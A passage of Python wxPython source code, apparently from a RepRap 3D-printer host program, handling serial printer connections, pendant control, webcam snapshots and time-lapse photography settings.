False\n\t\t\n\tdef getPrinter(self):\n\t\treturn self.printer\n\n\tdef isConnected(self):\n\t\treturn self.connected\n\n\tdef hasPendant(self):\n\t\treturn self.pendantConnected\n\n\tdef setPendant(self, flag=True):\n\t\tself.pendantConnected = flag\n\n\tdef tick(self):\n\t\tif self.prtmon is not None:\n\t\t\tself.prtmon.tick()\n\t\t\n\tdef assertAllowPulls(self, flag):\n\t\tif self.prtmon is not None:\n\t\t\tself.prtmon.assertAllowPulls(flag)\n\t\t\t\n\tdef isPrinting(self):\n\t\tif self.prtmon is not None:\n\t\t\treturn self.prtmon.isPrinting()\n\t\treturn False\n\t\t\n\tdef close(self):\n\t\tself.reprap.disconnect()\n\t\twhile not self.reprap.checkDisconnection():\n\t\t\ttime.sleep(0.1)\n\t\tself.reprap = None\n\t\t\n\t\tself.parser = None\n\t\t\n\t\tif self.prtmon:\n\t\t\tself.prtmon.onClose(None)\n\t\t\tself.prtmon = None\n\t\t\t\n\t\tif self.manctl:\n\t\t\tself.manctl = None\n\n\tdef setNBPages(self, pm, mc):\n\t\tself.prtmon = pm\n\t\tself.manctl = mc\n\t\tself.parser.config(pm, mc)\n\t\tself.reprap.bind(pm, self.evtRepRap)\n\t\t\n\tdef evtRepRap(self, evt):\n\t\tif evt.event == RECEIVED_MSG:\n\t\t\tif self.parser is not None:\n\t\t\t\tif not self.parser.parseMsg(evt.msg):\n\t\t\t\t\tself.logger.LogMessage(\"(r) - \" + evt.msg)\n\t\telif self.prtmon is not None:\n\t\t\tself.prtmon.reprapEvent(evt)\n\nclass ConnectionManager:\n\tdef __init__(self, app):\n\t\tself.app = app\n\t\tself.settings = self.app.settings\n\t\tself.logger = self.app.logger\n\t\tself.connections = []\n\t\n\t\tself.portList = self.getPortList()\t\n\t\t\t\t\t\n\t\tself.printerList = self.settings.printers[:]\n\t\tself.activePorts = []\n\t\tself.activePrinters = []\n\t\tself.pendantConnection = None\n\t\tself.pendantIndex = None\n\t\tself.manageDlg = None\n\t\t\n\tdef manageDlgClose(self):\n\t\tself.manageDlg = None\n\t\t\n\tdef getPortList(self):\n\t\t\"\"\"scan for available ports. return a list of device names.\"\"\"\n\t\tpl = []\n\t\tfor pt in self.settings.portprefixes:\n\t\t\tpl += glob.glob(pt)\n\t\t\t\n\t\treturn sorted(pl)\n\n\tdef connectionCount(self):\n\t\treturn len(self.connections)\n\t\t\t\t\t\n\tdef getLists(self, refreshPorts=False):\n\t\tif refreshPorts:\n\t\t\tpl = self.getPortList()\n\t\t\tself.portList = []\n\t\t\tfor p in pl:\n\t\t\t\tif p not in self.activePorts:\n\t\t\t\t\tself.portList.append(p)\n\n\t\treturn (self.printerList, self.portList, self.connections)\n\t\t\n\tdef getStatus(self):\n\t\tstat = {}\n\t\tstat['nconnections'] = len(self.connections)\n\n\t\tcx = 1\t\t\t\n\t\tfor p in self.connections:\n\t\t\tpst = {}\n\t\t\tpst['printer'] = p.printer\n\t\t\tpst['port'] = p.port\n\t\t\tif p.isPrinting():\n\t\t\t\tpst['status'] = \"printing\"\n\t\t\t\tpst['printstat'] = p.prtmon.getStatus()\n\t\t\telse:\n\t\t\t\tpst['status'] = \"idle\"\n\n\t\t\tcid = \"connection.%d\" % cx\t\t\t\t\n\t\t\tstat[cid] = pst\n\t\t\tcx += 1\n\t\t\t\t\n\t\treturn stat\n\t\n\tdef getTemps(self):\n\t\tresult = {}\n\t\tresult['nconnections'] = len(self.connections)\n\n\t\tcx = 1\t\t\t\n\t\tfor p in self.connections:\n\t\t\tpt = {}\n\t\t\tpt['printer'] = p.printer\n\t\t\tpt['temps'] = p.prtmon.getTemps()\n\n\t\t\tcid = \"connection.%d\" % cx\t\t\t\t\n\t\t\tresult[cid] = pt\n\t\t\tcx += 1\n\t\t\t\n\t\treturn result\n\t\n\tdef pendantCommand(self, cmd):\n\t\tif self.pendantConnection:\n\t\t\tif not self.pendantConnection.manctl.pendantCommand(cmd):\n\t\t\t\tif not self.pendantConnection.prtmon.pendantCommand(cmd):\n\t\t\t\t\tself.logger.LogMessage(\"Unknown pendant command: %s\" % cmd)\n\n\t\telse:\n\t\t\tself.logger.LogMessage(\"Pendant command ignored - no printer connected\")\n\n\tdef activatePendant(self, flag):\n\t\tself.pendantConnection = None\n\t\tself.pendantIndex = None\n\t\tfor cx in self.connections:\n\t\t\tcx.setPendant(False)\n\n\t\tif flag:\n\t\t\tif len(self.connections) > 0:\n\t\t\t\tself.pendantConnection = self.connections[0]\n\t\t\t\tself.pendantConnection.setPendant(True)\n\t\t\t\tself.pendantIndex = 0\n\n\tdef connectPendant(self, cx):\n\t\tif cx == self.pendantIndex:\n\t\t\treturn\n\n\t\tif cx < 0 or cx >= len(self.connections):\n\t\t\tself.pendantIndex = None\n\t\t\tself.pendantConnection = None\n\t\t\tfor c in self.connections:\n\t\t\t\tc.setPendant(False)\n\t\t\tself.app.setPendantConnection(None)\n\t\telse:\n\t\t\tself.pendantIndex = cx\n\t\t\tif not self.pendantConnection is None:\n\t\t\t\tself.pendantConnection.setPendant(False)\n\t\t\tself.pendantConnection = self.connections[cx]\n\t\t\tself.pendantConnection.setPendant(True)\n\t\t\tself.app.setPendantConnection(self.connections[cx].printer)\n\t\n\tdef connect(self, printer, port, baud):\n\t\tcx = Connection(self.app, printer, port, baud)\n\t\tif not cx.isConnected():\n\t\t\tself.logger.LogMessage(\"Unable to connect to port %s\" % port)\n\t\t\treturn False\n\n\t\tself.connections.append(cx)\n\t\tif len(self.connections) == 1:\n\t\t\tself.pendantConnection = cx\n\t\t\tself.pendantIndex = 0\n\t\t\tcx.setPendant(True)\n\t\telse:\n\t\t\tcx.setPendant(False)\n\t\t\t\n\t\tself.activePorts.append(port)\n\t\tself.activePrinters.append(printer)\n\t\tself.portList.remove(port)\n\t\tself.printerList.remove(printer)\n\t\t(pm, mc) = self.app.addPages(printer, cx.reprap)\n\t\tcx.setNBPages(pm, mc)\n\t\treturn True\n\t\t\n\tdef connectionByPrinter(self, printer):\n\t\ttry:\n\t\t\tidx = self.activePrinters.index(printer)\n\t\texcept:\n\t\t\tself.logger.LogMessage(\"Unable to find connection with printer %s\" % printer)\n\t\t\treturn None\n\t\t\n\t\treturn self.connections[idx]\n\t\n\tdef getConnection(self, cx):\n\t\tif cx < 0 or cx >= len(self.connections):\n\t\t\treturn None\n\t\telse:\n\t\t\treturn self.connections[cx]\n\t\t\n\tdef disconnectByPrinter(self, printer):\n\t\ttry:\n\t\t\tidx = self.activePrinters.index(printer)\n\t\texcept:\n\t\t\tself.logger.LogMessage(\"Unable to find connection with printer %s\" % printer)\n\t\t\treturn False\n\t\t\n\t\tdel self.activePrinters[idx]\n\t\tport = self.activePorts[idx]\n\t\tdel self.activePorts[idx]\n\t\tcon = self.connections[idx]\n\t\tdel self.connections[idx]\n\t\t\n\t\tself.fixPendantLinkage(self.pendantIndex == idx)\n\t\t\n\t\tself.printerList.append(printer)\n\t\tself.printerList.sort()\n\t\tself.portList.append(port)\n\t\tself.portList.sort()\n\t\tself.app.delPages(printer)\n\n\t\tcon.close()\n\t\treturn True\n\t\t\n\tdef disconnectByPort(self, port):\n\t\ttry:\n\t\t\tidx = self.activePorts.index(port)\n\t\texcept:\n\t\t\tself.logger.LogMessage(\"Unable to find connection with port %s\" % port)\n\t\t\treturn False\n\t\t\n\t\tdel self.activePorts[idx]\n\t\tprinter = self.activePrinters[idx]\n\t\tdel self.activePrinters[idx]\n\t\tcon = self.connections[idx]\n\t\tdel self.connections[idx]\n\t\t\n\t\tself.fixPendantLinkage(self.pendantIndex == idx)\n\t\t\n\t\tself.printerList.append(printer)\n\t\tself.printerList.sort()\n\t\tself.portList.append(port)\n\t\tself.portList.sort()\n\t\tself.app.delPages(printer)\n\n\t\tcon.close()\n\t\treturn True\n\n\n\tdef fixPendantLinkage(self, delPendant):\n\t\tif delPendant:\n\t\t\tif len(self.connections) == 0:\n\t\t\t\tself.pendantIndex = None\n\t\t\t\tself.pendantConnection = None\n\t\t\telse:\n\t\t\t\tself.pendantIndex = 0\n\t\t\t\tself.pendantConnection = self.connections[0]\n\t\t\t\tself.pendantConnection.setPendant(True)\n\t\telse:\n\t\t\tself.pendantIndex = None\n\t\t\tfor ix in range(len(self.connections)):\n\t\t\t\tif self.connections[ix].hasPendant():\n\t\t\t\t\tself.pendantIndex = ix\n\t\t\t\t\tbreak\n\t\t\tif self.pendantIndex is None:\n\t\t\t\tself.pendantConnection = None\n\t\n\tdef disconnectAll(self):\n\t\tfor p in self.activePrinters:\n\t\t\tself.app.delPages(p)\n\t\tself.printerList.extend(self.activePrinters)\n\t\tself.activePrinters = []\n\t\tself.portList.extend(self.activePorts)\n\t\tself.activePorts = []\n\t\tfor c in self.connections:\n\t\t\tc.close()\n\t\tself.connections = []\n\t\tself.pendantIndex = None\n\t\tself.pendantConnection = None\n\t\n\tdef disconnectByRepRap(self, reprap):\n\t\tport = reprap.getPort()\n\t\treturn self.disconnectByPort(port)\n\t\nclass SnapFrame(wx.Frame):\n\tdef __init__(self, parent, picfn):\n\t\tself.fn = picfn\n\t\twx.Frame.__init__(self, parent, wx.ID_ANY, \"Snapshot\", (-1, -1), (-1, -1), wx.DEFAULT_FRAME_STYLE)\n\t\tself.Bind(wx.EVT_CLOSE, self.onClose)\n\t\t\n\t\tpng = wx.Image(picfn, wx.BITMAP_TYPE_PNG).ConvertToBitmap()\n\t\t\n\t\tsz = wx.BoxSizer(wx.VERTICAL)\n\t\t\n\t\tsz.Add(wx.StaticBitmap(self, wx.ID_ANY, png, (-1, -1), (png.GetWidth(), png.GetHeight())))\n\t\tsz.AddSpacer((10,10))\n\t\t\n\t\tself.cbRetain = wx.CheckBox(self, wx.ID_ANY, \"Retain file %s\" % picfn)\n\t\tsz.Add(self.cbRetain, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5)\n\t\tsz.AddSpacer((10,10))\n\t\t\n\t\tself.SetSizer(sz)\n\t\tself.Fit()\n\t\t\t\n\tdef onClose(self, evt):\n\t\tif not self.cbRetain.IsChecked():\n\t\t\ttry:\n\t\t\t\tos.unlink(self.fn)\n\t\t\texcept:\n\t\t\t\tpass\n\t\tself.Destroy()\n\nclass ConnectionManagerPanel(wx.Panel):\n\tdef __init__(self, parent, app):\n\t\tself.parent = parent\n\t\tself.app = app\n\t\tself.settings = self.app.settings\n\t\tself.logger = self.app.logger\n\t\tself.CameraPort = None\n\t\tself.timeLapsePaused = False\n\t\tself.timeLapseRunning = False\n\t\tself.tlTick = 0\n\t\t\n\t\tself.vSaturation = -1\n\t\tself.vContrast = -1\n\t\tself.vBrightness = -1\n\t\t\n\t\twx.Panel.__init__(self, parent, wx.ID_ANY, size=(400, 250))\n\t\t\n\t\tself.CamLock = thread.allocate_lock()\n\n\t\tself.cm = ConnectionManager(self.app)\n\t\tself.Bind(EVT_PENDANT, self.pendantCommand)\n\t\tself.pendant = Pendant(self.pendantEvent, self.settings.pendantPort, self.settings.pendantBaud)\n\t\tself.pendantActive = False\n\t\t\n\t\tself.webcam = Webcam(self.settings.cameraport, self.settings.cmdfolder)\n\t\t\n\t\tself.camActive = False\n\t\tself.resolution = self.settings.resolution #TODO: work this back in\n\t\t\n\t\tf = wx.Font(12, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD)\n\t\tdc = wx.WindowDC(self)\n\t\tdc.SetFont(f)\n\n\t\tself.sizer = wx.BoxSizer(wx.VERTICAL)\n\n\t\tsboxConnect = wx.StaticBox(self, -1, \"Available ports/printers:\")\n\t\tszsbConnect = wx.StaticBoxSizer(sboxConnect, wx.VERTICAL)\n\t\t\n\t\tszConnect = wx.BoxSizer(wx.VERTICAL)\n\t\tszConnect.AddSpacer((20, 20))\n\t\t\n\t\tszRow = wx.BoxSizer(wx.HORIZONTAL)\n\t\tszRow.AddSpacer((20, 20))\n\t\tsz = wx.BoxSizer(wx.VERTICAL)\n\t\ttext = \"Port:\"\n\t\tw, h = dc.GetTextExtent(text)\n\t\t\t\n\t\tt = wx.StaticText(self, wx.ID_ANY, text, style=wx.ALIGN_RIGHT, size=(w, h))\n\t\tt.SetFont(f)\n\t\tsz.Add(t)\n\t\t\n\t\t(printers, ports, connections) = self.cm.getLists()\n\t\t\n\t\tself.lbPort = wx.ListBox(self, wx.ID_ANY, (-1, -1), (270, 120), ports, wx.LB_SINGLE)\n\t\tself.lbPort.SetFont(f)\n\t\tself.lbPort.SetToolTipString(\"Choose the port to which to connect\")\n\t\tif len(ports) == 0:\n\t\t\tself.lbPort.Disable()\n\t\telse:\n\t\t\tself.lbPort.Enable()\n\t\t\tself.lbPort.SetSelection(0)\n\t\tsz.Add(self.lbPort)\n\t\tszRow.Add(sz)\n\t\tszRow.AddSpacer((10, 10))\n\t\t\n\t\tsz = wx.BoxSizer(wx.VERTICAL)\n\t\t\n\t\ttext = \"Baud:\"\n\t\tw, h = dc.GetTextExtent(text)\n\t\t\n\t\tt = wx.StaticText(self, wx.ID_ANY, text, style=wx.ALIGN_RIGHT, size=(w, h))\n\t\tt.SetFont(f)\n\t\tsz.Add(t)\n\t\t\n\t\tself.lbBaud = wx.ListBox(self, wx.ID_ANY, (-1, -1), (100, 150), baudChoices, wx.LB_SINGLE)\n\t\tself.lbBaud.SetFont(f)\n\t\tself.lbBaud.SetToolTipString(\"Choose the baud rate\")\n\t\tself.lbBaud.SetSelection(5)\n\t\tsz.Add(self.lbBaud)\n\t\tszRow.Add(sz)\n\t\tszRow.AddSpacer((10, 10))\n\t\t\n\t\tsz = wx.BoxSizer(wx.VERTICAL)\n\t\t\t\n\t\ttext = \"Printer:\"\n\t\tw, h = dc.GetTextExtent(text)\n\t\tt = wx.StaticText(self, wx.ID_ANY, text, style=wx.ALIGN_RIGHT, size=(w, h))\n\t\tt.SetFont(f)\n\t\tsz.Add(t)\n\t\t\n\t\tself.lbPrinter = wx.ListBox(self, wx.ID_ANY, (-1, -1), (100, 120), printers, wx.LB_SINGLE)\n\t\tself.lbPrinter.SetFont(f)\n\t\tself.lbPrinter.SetToolTipString(\"Choose the printer\")\n\t\tself.lbPrinter.SetSelection(0)\n\t\tsz.Add(self.lbPrinter)\n\t\tszRow.Add(sz)\n\t\tszRow.AddSpacer((20, 20))\n\t\tszConnect.Add(szRow)\n\t\tszConnect.AddSpacer((20, 20))\n\t\t\n\t\tsboxDisconnect = wx.StaticBox(self, -1, \"Active Connections:\")\n\t\tszsbDisconnect = wx.StaticBoxSizer(sboxDisconnect, wx.VERTICAL)\n\t\tszDisconnect = wx.BoxSizer(wx.HORIZONTAL)\n\t\tszDisconnect.AddSpacer((20, 20))\n\n\t\tself.lbConnections = ActiveConnectionCtrl(self, self.app.images)\n\t\tself.lbConnections.SetToolTipString(\"Choose the connection\")\n\t\tself.loadConnections(connections)\n\t\tszDisconnect.Add(self.lbConnections, flag=wx.ALL, border=10)\n\t\t\n\t\tszButtons = wx.BoxSizer(wx.VERTICAL)\n\t\t\t\n\t\tszButtons.AddSpacer((10, 10))\n\t\t\n\t\tself.bConnect = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngConnect, size=BUTTONDIMLG)\n\t\tself.bConnect.SetToolTipString(\"Connect to the printer\")\n\t\tself.Bind(wx.EVT_BUTTON, self.doConnect, self.bConnect)\n\t\tszButtons.Add(self.bConnect, flag=wx.ALL, border=10)\n\t\tself.bConnect.Enable(len(ports) >= 1)\n\t\tszButtons.AddSpacer((10, 10))\n\n\t\tself.bDisconnect = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngDisconnect, size=BUTTONDIMLG)\n\t\tself.bDisconnect.SetToolTipString(\"Disconnect the printer\")\n\t\tszButtons.Add(self.bDisconnect, flag=wx.ALL, border=10)\n\t\tself.bDisconnect.Enable(False)\n\t\tself.Bind(wx.EVT_BUTTON, self.doDisconnect, self.bDisconnect)\n\t\tszButtons.AddSpacer((20, 20))\n\n\t\tself.bReset = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngReset, size=BUTTONDIMLG)\n\t\tself.bReset.SetToolTipString(\"Reset the printer\")\n\t\tszButtons.Add(self.bReset, flag=wx.ALL, border=10)\n\t\tself.Bind(wx.EVT_BUTTON, self.doReset, self.bReset)\n\t\tself.bReset.Enable(False)\n\t\tszButtons.AddSpacer((20, 20))\n\t\t\n\t\tself.bPort = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngPorts, size=BUTTONDIMLG)\n\t\tself.bPort.SetToolTipString(\"Refresh list of available ports\")\n\t\tszButtons.Add(self.bPort, flag=wx.ALL, border=10)\n\t\tself.Bind(wx.EVT_BUTTON, self.doPort, self.bPort)\n\n\t\tszsbConnect.Add(szConnect)\n\t\tszsbDisconnect.Add(szDisconnect)\n\n\t\tsboxCamera = wx.StaticBox(self, -1, \"Camera\")\n\t\tszsbCamera = wx.StaticBoxSizer(sboxCamera, wx.VERTICAL)\n\t\tszCamera = wx.BoxSizer(wx.HORIZONTAL)\n\n\t\tsboxCamCtrl = wx.StaticBox(self, -1, \"Camera Control\")\n\t\thszCamCtrl = wx.StaticBoxSizer(sboxCamCtrl, wx.HORIZONTAL)\n\t\tszCamCtrl = wx.BoxSizer(wx.VERTICAL)\n\t\tszCamCtrl.AddSpacer((10, 10))\n\n\t\tself.cbCamActive = wx.CheckBox(self, wx.ID_ANY, \"Activate Camera\")\n\t\tself.cbCamActive.SetToolTipString(\"Activate/Deactivate the camera\")\n\t\tself.Bind(wx.EVT_CHECKBOX, self.checkCamActive, self.cbCamActive)\n\t\tszCamCtrl.Add(self.cbCamActive)\n\t\tself.cbCamActive.SetValue(False)\n\t\tself.camActive = False\n\t\t\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\t\n\t\tports = self.getCamPorts()\n\t\tself.lbCamPort = wx.ListBox(self, wx.ID_ANY, (-1, -1), (270, 120), ports, wx.LB_SINGLE)\n\t\tself.lbCamPort.SetFont(f)\n\t\tself.lbCamPort.SetToolTipString(\"Choose the port to which to connect\")\n\t\tif len(ports) == 0:\n\t\t\tself.lbCamPort.Disable()\n\t\telse:\n\t\t\tself.lbCamPort.Enable()\n\t\t\tself.lbCamPort.SetSelection(0)\n\t\tszCamera.AddSpacer((10, 10))\n\t\tszCamera.Add(self.lbCamPort)\n\t\t\n\t\tif len(ports) <= 0:\n\t\t\tself.cbCamActive.Enable(False)\n\t\t\tself.camActive = False\n\t\telse:\n\t\t\tself.cbCamActive.Enable(True)\n\n\t\tself.bSnapShot = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngSnapshot, size=BUTTONDIM)\n\t\tself.bSnapShot.SetToolTipString(\"Take a picture\")\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\tszCamCtrl.Add(self.bSnapShot, 1, wx.ALIGN_CENTER_HORIZONTAL, 0)\n\t\tself.Bind(wx.EVT_BUTTON, self.doSnapShot, self.bSnapShot)\n\t\tself.bSnapShot.Enable(False)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\thb.Add(wx.StaticText(self, wx.ID_ANY, \"Brightness: \", size=(100, -1)), 1, wx.TOP, 20)\n\t\tself.slBrightness = wx.Slider(\n\t\t\tself, wx.ID_ANY, 50, 0, 100, size=(320, -1), \n\t\t\tstyle=wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS \n\t\t\t)\n\t\tself.slBrightness.SetTickFreq(10, 1)\n\t\tself.slBrightness.SetPageSize(1)\n\t\thb.Add(self.slBrightness)\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\tszCamCtrl.Add(hb)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\thb.Add(wx.StaticText(self, wx.ID_ANY, \"Contrast: \", size=(100, -1)), 1, wx.TOP, 20)\n\t\tself.slContrast = wx.Slider(\n\t\t\tself, wx.ID_ANY, 50, 0, 100, size=(320, -1), \n\t\t\tstyle=wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS \n\t\t\t)\n\t\tself.slContrast.SetTickFreq(10, 1)\n\t\tself.slContrast.SetPageSize(1)\n\t\thb.Add(self.slContrast)\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\tszCamCtrl.Add(hb)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\thb.Add(wx.StaticText(self, wx.ID_ANY, \"Saturation: \", size=(100, -1)), 1, wx.TOP, 20)\n\t\tself.slSaturation = wx.Slider(\n\t\t\tself, wx.ID_ANY, 50, 0, 100, size=(320, -1), \n\t\t\tstyle=wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS \n\t\t\t)\n\t\tself.slSaturation.SetTickFreq(10, 1)\n\t\tself.slSaturation.SetPageSize(1)\n\t\thb.Add(self.slSaturation)\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\tszCamCtrl.Add(hb)\n\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\thszCamCtrl.AddSpacer((10, 10))\n\t\thszCamCtrl.Add(szCamCtrl)\n\t\thszCamCtrl.AddSpacer((10, 10))\n\n\t\tsboxTl = wx.StaticBox(self, wx.ID_ANY, \"Time Lapse Control\")\n\t\thszTlCtrl = wx.StaticBoxSizer(sboxTl, wx.HORIZONTAL)\n\t\tszTlCtrl = wx.BoxSizer(wx.VERTICAL)\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\tself.bTimeStart = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngTimestart, size=BUTTONDIM)\n\t\tself.bTimeStart.SetToolTipString(\"Start time lapse photography\")\n\t\thb.AddSpacer((10, 10))\n\t\thb.Add(self.bTimeStart)\n\t\tself.Bind(wx.EVT_BUTTON, self.doTimeLapseStart, self.bTimeStart)\n\t\tself.bTimeStart.Enable(False)\n\t\t\n\t\tself.bTimePause = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngTimepause, size=BUTTONDIM)\n\t\tself.bTimePause.SetToolTipString(\"Pause/resume time lapse photography\")\n\t\thb.AddSpacer((10, 10))\n\t\thb.Add(self.bTimePause)\n\t\tself.Bind(wx.EVT_BUTTON, self.doTimeLapsePause, self.bTimePause)\n\t\tself.bTimePause.Enable(False)\n\t\t\n\t\tself.bTimeStop = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngTimestop, size=BUTTONDIM)\n\t\tself.bTimeStop.SetToolTipString(\"Stop time lapse photography\")\n\t\thb.AddSpacer((10, 10))\n\t\thb.Add(self.bTimeStop)\n\t\tself.Bind(wx.EVT_BUTTON, self.doTimeLapseStop, self.bTimeStop)\n\t\tself.bTimeStop.Enable(False)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\tszTlCtrl.Add(hb)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\thb.Add(wx.StaticText(self, wx.ID_ANY, \"Interval(sec): \"), 1, wx.TOP, 20)\n\t\thb.AddSpacer((20, 20))\n\t\tself.slInterval = wx.Slider(\n\t\t\tself, wx.ID_ANY, 10, 5, 300, size=(320, -1), \n\t\t\tstyle=wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS \n\t\t\t)\n\t\tself.slInterval.SetTickFreq(10, 1)\n\t\tself.slInterval.SetPageSize(1)\n\t\thb.Add(self.slInterval)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\tszTlCtrl.Add(hb)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\tself.rbDuration = wx.RadioBox(\n\t\t\t\tself, wx.ID_ANY, \"Duration\", wx.DefaultPosition, wx.DefaultSize,\n\t\t\t\t[\"Count\", \"Seconds\"], 1, wx.RA_SPECIFY_COLS)\n\t\t\n\t\thb.Add(self.rbDuration)\n\t\thb.AddSpacer((20, 20))\n\t\t\n\t\tself.tcDuration = wx.TextCtrl(self, -1, \"10\", size=(80, -1))\n\t\thb.Add(self.tcDuration, 0, wx.TOP, 20)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\tszTlCtrl.Add(hb)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\tself.bDir = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngDirectory, size=BUTTONDIM)\n\t\thb.Add(self.bDir)\n\t\tself.Bind(wx.EVT_BUTTON, self.setTlDirectory, self.bDir)\n\t\thb.AddSpacer((20, 20))\n\n\t\tipfont = wx.Font(14, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD)\n\t\tdc = wx.WindowDC(self)\n\t\tdc.SetFont(ipfont)\n\t\tself.tlDir = os.path.join(self.settings.cmdfolder, \"tlpics\")\n\t\tw, h = dc.GetTextExtent(\"X\" * MAXDIRCHARS)\n\t\tw = int(0.75 * w)\n\t\tpadding = \" \" * MAXDIRCHARS\n\t\tself.txtDir = wx.StaticText(self, wx.ID_ANY, self.tlDir + padding, style=wx.ALIGN_LEFT, size=(w, h))\n\t\tself.txtDir.SetFont(ipfont)\n\t\thb.Add(self.txtDir, 1, wx.TOP, 12)\n\t\t\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\tszTlCtrl.Add(hb)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\n\t\tw, h = dc.GetTextExtent(\"X\" * MAXSTATCHARS)\n\t\tw = int(0.75 * w)\n\t\tpadding = \" \" * MAXSTATCHARS\n\t\tself.txtTlStatus = wx.StaticText(self, wx.ID_ANY, padding, style=wx.ALIGN_LEFT, size=(w, h))\n\t\tself.txtTlStatus.SetFont(ipfont)\n\t\thb.Add(self.txtTlStatus)\n\t\t\n\t\tszTlCtrl.Add(hb)\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\t\n\t\thszTlCtrl.AddSpacer((20, 20))\n\t\thszTlCtrl.Add(szTlCtrl)\n\t\thszTlCtrl.AddSpacer((10, 10))\n\t\t\n\t\tszCamera.AddSpacer((10, 10))\n\t\tszsbCamera.AddSpacer((10, 10))\n\t\tszsbCamera.Add(szCamera)\n\t\tszsbCamera.AddSpacer((10, 10))\n\n\t\tsz = wx.BoxSizer(wx.HORIZONTAL)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(szsbConnect)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(szButtons)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(szsbDisconnect)\n\t\tsz.AddSpacer((20, 20))\n\t\t\n\t\tself.sizer.AddSpacer((20, 20))\n\t\tself.sizer.Add(sz)\n\n\t\tsz = wx.BoxSizer(wx.HORIZONTAL)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(szsbCamera)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(hszCamCtrl)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(hszTlCtrl)\n\t\t\n\t\tself.sizer.AddSpacer((50, 50))\n\t\tself.sizer.Add(sz)\n\n\t\tself.sizer.AddSpacer((20, 20))\n\t\tself.SetSizer(self.sizer)\n\t\t#self.lbCamPort.SetSelection(0)\n\t\t\n\tdef setTlDirectory(self, evt):\n\t\tdlg = wx.DirDialog(self, \"Choose a directory for timelapse pictures:\")\n\t\tif dlg.ShowModal() == wx.ID_OK:\n\t\t\tself.tlDir = dlg.GetPath()\n\t\t\tself.txtDir.SetLabel(self.tlDir)\n\n\t\tdlg.Destroy()\n\t\t\n\tdef doTimeLapseStart(self, evt):\n\t\tself.setCamProperties()\n\t\tinterval = self.slInterval.GetValue()\n\t\t\n\t\tdType = self.rbDuration.GetSelection()\n\t\ttry:\n\t\t\tdVal = int(self.tcDuration.GetValue())\n\t\texcept:\n\t\t\tdlg = wx.MessageDialog(self, \"Invalid duration Value\",\n\t\t\t\t\t'Invalid Value', wx.OK | wx.ICON_ERROR)\n\t\n\t\t\tdlg.ShowModal()\n\t\t\tdlg.Destroy()\n\t\t\treturn\n\t\t\t\n\t\tif dType == 0:\n\t\t\tcount = dVal\n\t\t\tseconds = None\n\t\telse:\n\t\t\tcount = None\n\t\t\tseconds = dVal\n\t\t\t\n\t\tself.webcam.timelapseStart(interval, count=count, duration=seconds, directory=self.tlDir)\n\t\tself.timeLapsePaused = False\n\t\tself.timeLapseRunning = True\n\t\tself.tlTick = TLTICKRATE\n\t\t\n\t\t#self.bSnapShot.Enable(False)\n\t\tself.bTimeStart.Enable(False)\n\t\tself.lbCamPort.Enable(False)\n\t\tself.cbCamActive.Enable(False)\n\n\t\tself.bTimePause.Enable(True)\n\t\tself.bTimeStop.Enable(True)\n\t\t\n\t\tself.getTLStatus()\n\t\t\n\tdef timeLapseEnded(self):\n\t\tself.timeLapsePaused = False\n\t\tself.timeLapseRunning = False\n\t\t\n\t\tself.updateTimeLapseStatus(\"\")\n\t\tself.bTimeStart.Enable(True)\n\t\tself.lbCamPort.Enable(True)\n\t\tself.cbCamActive.Enable(True)\n\n\t\tself.bTimePause.Enable(False)\n\t\tself.bTimeStop.Enable(False)\n\t\t\n\tdef updateTimeLapseStatus(self, text):\n\t\tself.txtTlStatus.SetLabel(text)\n\t\t\n\tdef doTimeLapsePause(self, evt):\n\t\tself.timeLapsePaused = not self.timeLapsePaused\n\t\tif 